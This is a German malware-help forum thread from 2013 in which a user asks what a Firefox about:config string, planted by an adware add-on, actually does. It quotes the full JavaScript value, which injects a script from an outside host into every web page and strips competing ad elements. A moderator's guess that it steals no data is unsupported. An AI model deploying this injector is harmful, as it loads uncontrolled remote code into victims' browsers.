Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag?

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 10.08.2013, 21:24   #1
mb78
 
Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag? - Frage

Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag?



Hallo,

nachdem ich hier schon öfter Hilfe ohne neuen Thread finden konnte habe ich jetzt doch eine Frage.
Ich habe mir einen Schädling eingefangen der einen String Wert im Firefox erstellt.
Die Entfernung läuft gerade, mich würde aber interessieren was der Eintrag genau bewirkt.
Klingt nach Programmier- oder Scriptsprache.

Die geänderte Einstellung heißt:
extensions.FaMbl.scode

Der Typ ist wie gesagt
String

Der genaue Wert ist sehr lang und lautet:

Code:
ATTFilter
if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//i.74055djs.info/74055d/javascript.js?channel=p714&hid=0';document.getElementsByTagName("head")[0].appendChild(script);};if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer.length)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))}
         
Ich kann erkennen dass er irgendwelche Elemente holen soll (get) wenn (if) eine Bedingung erfüllt ist.
Was hier nun aber genau passieren soll ist mir ein Rätsel.
Würde mich über Aufklärung freuen.

Den Weg zur Entfernung habe ich hier gefunden: h**p://www.technicalforum.org/windows/my-web-browser-firefox-getting-slow-status-bar-shows-connecting-i74055djsinfo
Interessant ist dass man ohne Schädlingssuche den Wert zwar zurücksetzen kann er aber nach Neustart des Firefox wieder wie oben beschrieben erscheint.

Alt 10.08.2013, 21:30   #2
schrauber
/// the machine
/// TB-Ausbilder
 

Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag? - Standard

Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag?



hi,

bin kein Programmierer, also kann ich bei dem Code nicht helfen, aber bei der Bereinigung.
__________________

__________________

Alt 11.08.2013, 04:36   #3
mb78
 
Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag? - Standard

Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag?



Danke, klingt gut.
Ich versuche erst mal den Weg den ich gefunden habe.
Falls dieser nicht den gewünschten Effekt bringt gebe ich Rückmeldung.

[edit]Ok, Javascript...[/edit]

Hm........mit Avast gescannt, neun Bedrohungen entfernt, Malwarebytes Anti Malware hat auch noch eine gefunden......und trotzdem stellt sich der String Wert nach Zurücksetzen immer wieder um.
Im Moment läuft der Housecall von Trendmicro.
Wäre es sinnvoll die Scans im abgesicherten Modus laufen zu lassen?

Ok, Problem gelöst.....war ein Firefox Addon installiert namens Savenshareee.
Dieses habe ich deinstalliert, Emisoft, Malwarebytes und Avast sind zufrieden und der String bleibt zurück gesetzt.
__________________

Alt 11.08.2013, 16:06   #4
schrauber
/// the machine
/// TB-Ausbilder
 

Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag? - Standard

Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag?



ok
__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Alt 11.08.2013, 17:27   #5
mb78
 
Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag? - Standard

Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag?



Nichtsdestotrotz würde mich immer noch interessieren was genau dieses Script nun getan hat.
Muss ich mir Sorgen um meine Daten machen?


Alt 12.08.2013, 07:46   #6
schrauber
/// the machine
/// TB-Ausbilder
 

Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag? - Standard

Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag?



Wie gesagt, bin kein Programmierer, aber dass das Teil Daten stiehlt halte ich für unwarscheinlich.
__________________
--> Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag?

Antwort

Themen zu Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag?
about, aufklärung, bewirkt, config, eingefangen, einstellung, eintrag, entfernung, erkennen, erscheint, erstell, erstellt, firefox, gefangen, gen, geänderte, konnte, neue, neuen, neustart, passieren, schädling, thread, würde, zurücksetzen



Ähnliche Themen: Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag?


  1. Schädling in Firefox / Flash
    Log-Analyse und Auswertung - 28.01.2015 (16)
  2. Mozilla Firefox befallen - greao Tsavinngo links werden automisch erstellt
    Log-Analyse und Auswertung - 06.10.2014 (20)
  3. Firefox erstellt lästige links auf verschiedene Wörter.
    Plagegeister aller Art und deren Bekämpfung - 14.03.2014 (10)
  4. TR/EyeStye.B.cfg.48 - config bin
    Log-Analyse und Auswertung - 27.02.2012 (5)
  5. 50Euro Virus - Win7 / 64 - OTL Logfile erstellt nach Anleitung erstellt
    Plagegeister aller Art und deren Bekämpfung - 06.01.2012 (2)
  6. Java String Helper Add on versucht sich zu Instalieren
    Plagegeister aller Art und deren Bekämpfung - 14.12.2011 (23)
  7. Facebook Trojaner bewirkt starke internet lags?
    Plagegeister aller Art und deren Bekämpfung - 12.12.2011 (8)
  8. GMER führt zum Systemabsturz, andere Logs erstellt, Firefox öffnet selbständig Tabs mit Werbung
    Log-Analyse und Auswertung - 29.03.2011 (13)
  9. Trojaner der Run Registry Eintrag immer wieder neu erstellt?
    Log-Analyse und Auswertung - 30.10.2008 (1)
  10. Schädling bewirkt falsches "Windows Security Alert" Popup
    Plagegeister aller Art und deren Bekämpfung - 19.08.2008 (13)
  11. Download von Messenger Skinner bewirkt nervige Popups
    Log-Analyse und Auswertung - 17.02.2008 (3)
  12. Trojaner über Messenger Skinner bewirkt nervige Popups
    Log-Analyse und Auswertung - 04.02.2008 (9)
  13. ANTI BAT.exe - Was bewirkt diese Datei?
    Plagegeister aller Art und deren Bekämpfung - 21.08.2005 (2)
  14. Was bewirkt der Trojaner TR/Dldr.JS.IstB.0.5?
    Plagegeister aller Art und deren Bekämpfung - 04.08.2005 (3)
  15. Was bewirkt TR/small.DG
    Plagegeister aller Art und deren Bekämpfung - 08.05.2004 (1)
  16. Schädling oder nicht Schädling ?!?
    Plagegeister aller Art und deren Bekämpfung - 07.05.2004 (0)

Zum Thema Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag? - Hallo, nachdem ich hier schon öfter Hilfe ohne neuen Thread finden konnte habe ich jetzt doch eine Frage. Ich habe mir einen Schädling eingefangen der einen String Wert im Firefox - Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag?...
Archiv
Du betrachtest: Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.